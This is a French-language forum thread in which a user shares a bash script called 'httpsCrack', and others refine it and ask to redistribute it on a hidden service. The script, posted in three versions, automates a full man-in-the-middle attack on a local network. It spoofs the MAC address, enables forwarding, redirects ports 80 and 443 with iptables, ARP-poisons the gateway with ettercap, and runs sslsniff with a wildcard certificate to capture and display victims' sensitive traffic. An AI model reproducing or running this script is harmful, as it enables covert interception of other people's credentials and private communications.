Vous n'êtes pas identifié(e).
Salut, je suis Rodrigue Daniel
Voilà je partage avec vous mon script bash permettant de sniffer les transactions issues du protocole SSL chiffrant les requêtes http.
Voici le code de mon script
#!/bin/bash
#
# httpsCrack : Script de crack du protocole https
# Description : C'est un script qui automatise l'attaque de l'homme du milieu au niveau
# de la couche transport et de la couche liaison de données afin d'interpréter les
# requêtes https.
# Mon blog : rodriguedaniel.blogspot.com
# 07/01/2016
# Dépendances : macchanger, ettercap, sslsniff, iptables
set -u
clear
################################################################################
# Definitions des variables
RED='\e[1;31m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
GREEN='\e[1;32m'
NC='\e[0m'
#---------------------------
erreur1=""
erreur2=""
dependance=""
interface=""
#################################################################################
echo -e $GREEN'
_ _ _ ____ _
| |__ | |_| |_ _ __ ___ / ___|_ __ __ _ ___| | __
| _ \| __| __| _ \/ __| | | __/ _` |/ __| |/ /
| | | | |_| |_| |_) \__ \ |___| | | (_| | (__| <
|_| |_|\__|\__| .__/|___/\____|_| \__,_|\___|_|\_\
|_|
'$NC
echo -e $GREEN"\t\t Description : Interpréteur des requêtes https "$NC
echo -e $GREEN"\t\t Auteur : Rodrigue Daniel (email : rodrigue_daniel@yahoo.com)\n"$NC
echo -e $GREEN"######################################################################################"$NC
# Vérification du mode root
if [[ $EUID -ne 0 ]]; then
echo -e $RED"\n\t Erreur : ce programme doit être éxécuté en root.\n"$NC
exit 1
fi
declare -a tabDependances=(macchanger ettercap sslsniff iptables)
erreur1="\n Erreur : Impossible de trouver le programme "
erreur2=", installez-le et réessayez.\n"
for dependance in "${tabDependances[@]}" ; do
which $dependance > /dev/null
if [ $? -eq 1 ]; then
echo $RED$erreur1$dependance$erreur2$NC
exit 1
fi
done
################################################################################
# Exécution du crack
echo -e $YELLOW"\n-------> Détection des interfaces"$NC
echo -ne $CYAN"\n==> "
ifconfig | cut -d " " -f 1 | xargs echo
echo -ne "\n Entrez l'interface à utiliser : "
if ! read interface ; then
echo -e $RED"\n Saisie Invalide."$NC
elif [ -z "$interface" ]; then
echo -e $RED"\n Saisie Vide." && exit 1
else
indexInterface=1
verifInterface='ifconfig | cut -d " " -f 1 | xargs echo | cut -d " " -f $indexInterface '
while eval $verifInterface >/dev/null ; do
if [ "$interface" != "$(eval $verifInterface)" ] && [ "$(eval $verifInterface)" = "" ]; then
echo -e $RED"\n Erreur : interface inconnue. \n"$NC
exit 1
elif [ "$interface" = "lo" ]; then
echo -e $RED"\n Oups : interface de bouclage. \n"$NC
exit 1
elif [ "$interface" = "$(eval $verifInterface)" ]; then
break
fi
indexInterface=$((indexInterface + 1))
done
fi
ipInterface=$(ifconfig $interface | grep "inet ad" | cut -d : -f 2 | awk '{print $1}')
if [ "$ipInterface" = "" ]; then
echo -e $RED"\n Oups : l'interface choisie n'a pas d'adresse IP. \n"$NC
fi
echo -e $YELLOW"\n-------> Masquage de l'adresse MAC de l'interface $interface"$NC
ifconfig $interface down
macchanger -A $interface > /dev/null
ifconfig $interface up
dhclient $interface > /dev/null 2>&1
echo -e $GREEN"\t\t OK"$NC
echo -e $YELLOW"\n-------> Activation du routage"$NC
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e $GREEN"\t\t OK"$NC
echo -e $YELLOW"\n-------> Détournement des ports"$NC
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo -e $GREEN"\t\t OK"$NC
echo -e $YELLOW"\n-------> Empoisonnement ARP du réseau global"$NC
echo -ne "\n Entrez l'adresse IP de la passerelle d'accès à Internet : "
read passerelle
(ettercap -T -M arp:remote /$passerelle/ // >/dev/null 2>&1)&
echo -e $GREEN"\t\t OK"$NC
echo -e $YELLOW"\n-------> Empoisonnement SSL du réseau global"$NC
if (sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 10000 -w infoCrack >/dev/null 2>&1)& ; then
echo -e $GREEN"\t\t OK"$NC
echo -e $YELLOW"\n-------> Affichage des informations sensibles"$NC
tail -n 50 -f infoCrack
else
echo -e $RED"\n Oups : echec de lancement du programme sslsniff.\n"$NC
exit 1
fi
exit 0
Vos suggestions, vos critiques seront la bienvenue.
MERCI
Dernière modification par rodrigue daniel (18-01-2016 00:05:26)
Passionné par la Sécurité Informatique.
Le véritable ennemi de la connaissance n'est pas l'ignorance mais l'illusion de la connaissance.
La quête de la connaissance passe d'abord par l'humilité et ensuite la détermination.
Hors ligne
Tu devrait mettre toutes tes variables de couleurs dans les quottes plutôt qu'en dehors, après ça je dois encore regarder le script et je te fait un retour.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Voilà, ma petite correction:
#!/bin/bash
#
# httpsCrack : Script de crack du protocole https
# Description : C'est un script qui automatise l'attaque de l'homme du milieu au niveau
# de la couche transport et de la couche liaison de données afin d'interpréter les
# requêtes https.
# Mon blog : rodriguedaniel.blogspot.com
# 07/01/2016
# Dépendances : macchanger, ettercap, sslsniff, iptables
set -u
clear
################################################################################
# Definitions des variables
RED='\e[1;31m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
GREEN='\e[1;32m'
NC='\e[0m'
#---------------------------
dependance=""
interface=""
#################################################################################
echo -e "$GREEN"'
_ _ _ ____ _
| |__ | |_| |_ _ __ ___ / ___|_ __ __ _ ___| | __
| _ \| __| __| _ \/ __| | | __/ _` |/ __| |/ /
| | | | |_| |_| |_) \__ \ |___| | | (_| | (__| <
|_| |_|\__|\__| .__/|___/\____|_| \__,_|\___|_|\_\
|_|
\t\tDescription: Interpréteur des requêtes https
\t\tAuteur: Rodrigue Daniel (email: rodrigue_daniel[at]yahoo[dot]com)
######################################################################################'"$NC"
# Vérification du mode root
if [[ $EUID -ne 0 ]]; then
echo -e "$RED\n\t Erreur : ce programme doit être éxécuté en root.\n$NC"
exit 1
fi
missingdep(){
echo -e "$RED\n Erreur : Impossible de trouver le programme $dependance, installez-le et réessayez.\n$NC"
exit 1
}
declare -a tabDependances=(macchanger ettercap sslsniff iptables)
for dependance in "${tabDependances[@]}" ; do
which $dependance > /dev/null || missingdep
done
################################################################################
# Exécution du crack
echo -e $YELLOW"\n-------> Détection des interfaces"$NC
echo -ne $CYAN"\n==> "
ls /sys/class/net/
echo -ne "\n Entrez l'interface à utiliser : "
if ! read interface ; then
echo -e $RED"\n Saisie Invalide."$NC
elif [ -z "$interface" ]; then
echo -e $RED"\n Saisie Vide." && exit 1
else
indexInterface=1
verifInterface='ifconfig | cut -d " " -f 1 | xargs echo | cut -d " " -f $indexInterface '
while eval $verifInterface >/dev/null ; do
if [ "$interface" != "$(eval $verifInterface)" ] && [ "$(eval $verifInterface)" = "" ]; then
echo -e $RED"\n Erreur : interface inconnue. \n"$NC
exit 1
elif [ "$interface" = "lo" ]; then
echo -e $RED"\n Oups : interface de bouclage. \n"$NC
exit 1
elif [ "$interface" = "$(eval $verifInterface)" ]; then
break
fi
indexInterface=$((indexInterface + 1))
done
fi
ipInterface=$(ifconfig $interface | grep "inet ad" | cut -d : -f 2 | awk '{print $1}')
if [ "$ipInterface" = "" ]; then
echo -e "$RED\n Oups : l'interface choisie n'a pas d'adresse IP. \n$NC"
fi
echo -e "$YELLOW\n-------> Masquage de l'adresse MAC de l'interface $interface$NC"
ifconfig $interface down
macchanger -A $interface > /dev/null
ifconfig $interface up
dhclient eth0 > /dev/null 2>&1
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Activation du routage$NC"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Détournement des ports$NC"
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Empoisonnement ARP du réseau global$NC"
echo -ne "\n Entrez l'adresse IP de la passerelle d'accès à Internet : "
read passerelle
(ettercap -T -M arp:remote /$passerelle/ // >/dev/null 2>&1)&
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Empoisonnement SSL du réseau global$NC"
if (sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 10000 -w infoCrack >/dev/null 2>&1)& ; then
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Affichage des informations sensibles$NC"
tail -n 50 -f infoCrack
else
echo -e "$RED\n Oups : echec de lancement du programme sslsniff.\n$NC"
exit 1
fi
exit 0
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Salut
IceF0x, c'est génial ta modification, elle est plus améliorée que la mienne. Surtout tu as amélioré la complexité en temps.
Tu viens de m'apprendre un truc avec la commande :
ls /sys/class/net/
mais je souhaiterais savoir si elle est portable. C'est a dire conforme à tous les systèmes linux.
Passionné par la Sécurité Informatique.
Le véritable ennemi de la connaissance n'est pas l'ignorance mais l'illusion de la connaissance.
La quête de la connaissance passe d'abord par l'humilité et ensuite la détermination.
Hors ligne
Je l'utilise sur Archlinux et debian, donc je pense que oui.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Très très intéressant merci. J'avais déjà utiliser tout ces programmes par le passé mais ton scripts est extrêmement bien écrit merci.
Tu permets que je le partage sur mon hidden service ?
Dernière modification par steeltempest (10-01-2016 17:17:54)
Mon email: hiddentux@sigaint.org - Mon blog: https://hiddentux.github.io
Hors ligne
Salut
J'ai légèrement modifié mon script, Voici Mon script modifié :
#!/bin/bash
#
# httpsCrack : Script de crack du protocole https
# Description : C'est un script qui automatise l'attaque de l'homme du milieu au niveau
# de la couche transport et de la couche liaison de données afin d'interpréter les
# requêtes https.
# Mon blog : rodriguedaniel.blogspot.com
# 07/01/2016
# Dépendances : macchanger, ettercap, sslsniff, iptables
set -u
clear
################################################################################
# Definitions des variables
RED='\e[1;31m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
GREEN='\e[1;32m'
NC='\e[0m'
#---------------------------
dependance=""
interface=""
#################################################################################
echo -e "$GREEN"'
_ _ _ ____ _
| |__ | |_| |_ _ __ ___ / ___|_ __ __ _ ___| | __
| _ \| __| __| _ \/ __| | | __/ _` |/ __| |/ /
| | | | |_| |_| |_) \__ \ |___| | | (_| | (__| <
|_| |_|\__|\__| .__/|___/\____|_| \__,_|\___|_|\_\
|_|
\t\tDescription: Interpréteur des requêtes https
\t\tAuteur: Rodrigue Daniel (email: rodrigue_daniel[at]yahoo[dot]com)
######################################################################################'"$NC"
# Vérification du mode root
if [[ $EUID -ne 0 ]]; then
echo -e "$RED\n\t Erreur : ce programme doit être éxécuté en root.\n$NC"
exit 1
fi
missingdep(){
echo -e "$RED\n Erreur : Impossible de trouver le programme $dependance, installez-le et réessayez.\n$NC"
exit 1
}
declare -a tabDependances=(macchanger ettercap sslsniff iptables)
for dependance in "${tabDependances[@]}" ; do
which $dependance > /dev/null || missingdep
done
################################################################################
# Exécution du crack
echo -e $YELLOW"\n-------> Détection des interfaces"$NC
echo -ne $CYAN"\n==> "
ls /sys/class/net/
echo -ne "\n Entrez l'interface à utiliser : "
if ! read interface ; then
echo -e $RED"\n Saisie Invalide."$NC
elif [ -z "$interface" ]; then
echo -e $RED"\n Saisie Vide." && exit 1
else
indexInterface=1
verifInterface='ifconfig | cut -d " " -f 1 | xargs echo | cut -d " " -f $indexInterface '
while eval $verifInterface >/dev/null ; do
if [ "$interface" != "$(eval $verifInterface)" ] && [ "$(eval $verifInterface)" = "" ]; then
echo -e $RED"\n Erreur : interface inconnue. \n"$NC
exit 1
elif [ "$interface" = "lo" ]; then
echo -e $RED"\n Oups : interface de bouclage. \n"$NC
exit 1
elif [ "$interface" = "$(eval $verifInterface)" ]; then
break
fi
indexInterface=$((indexInterface + 1))
done
fi
ipInterface=$(ifconfig $interface | grep "inet ad" | cut -d : -f 2 | awk '{print $1}')
if [ "$ipInterface" = "" ]; then
echo -e "$RED\n Oups : l'interface choisie n'a pas d'adresse IP. \n$NC"
fi
echo -e "$YELLOW\n-------> Masquage de l'adresse MAC de l'interface $interface$NC"
ifconfig $interface down
macchanger -A $interface > /dev/null
ifconfig $interface up
dhclient $interface > /dev/null 2>&1
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Activation du routage$NC"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Détournement des ports$NC"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Empoisonnement ARP du réseau global$NC"
echo -ne "\n Entrez l'adresse IP de la passerelle d'accès à Internet : "
read passerelle
(ettercap -T -M arp:remote /$passerelle/ // >/dev/null 2>&1)&
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Empoisonnement SSL du réseau global$NC"
(sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 10000 -h 10000 -w infoCrack >/dev/null 2>&1)&
if [ $? -eq 0 ] ; then
echo -e "$GREEN\t\t OK$NC"
echo -e "$YELLOW\n-------> Affichage des informations sensibles$NC"
tail -n 50 -f infoCrack
else
echo -e "$RED\n Oups : échec de lancement du programme sslsniff.\n$NC"
exit 1
fi
exit 0
Je préfère que tu utilises plutôt ceci pour partager dans ton hidden service...MERCI beaucoup
Dernière modification par rodrigue daniel (18-01-2016 00:03:31)
Passionné par la Sécurité Informatique.
Le véritable ennemi de la connaissance n'est pas l'ignorance mais l'illusion de la connaissance.
La quête de la connaissance passe d'abord par l'humilité et ensuite la détermination.
Hors ligne
Ok Rodrigue. Merci.
Mon email: hiddentux@sigaint.org - Mon blog: https://hiddentux.github.io
Hors ligne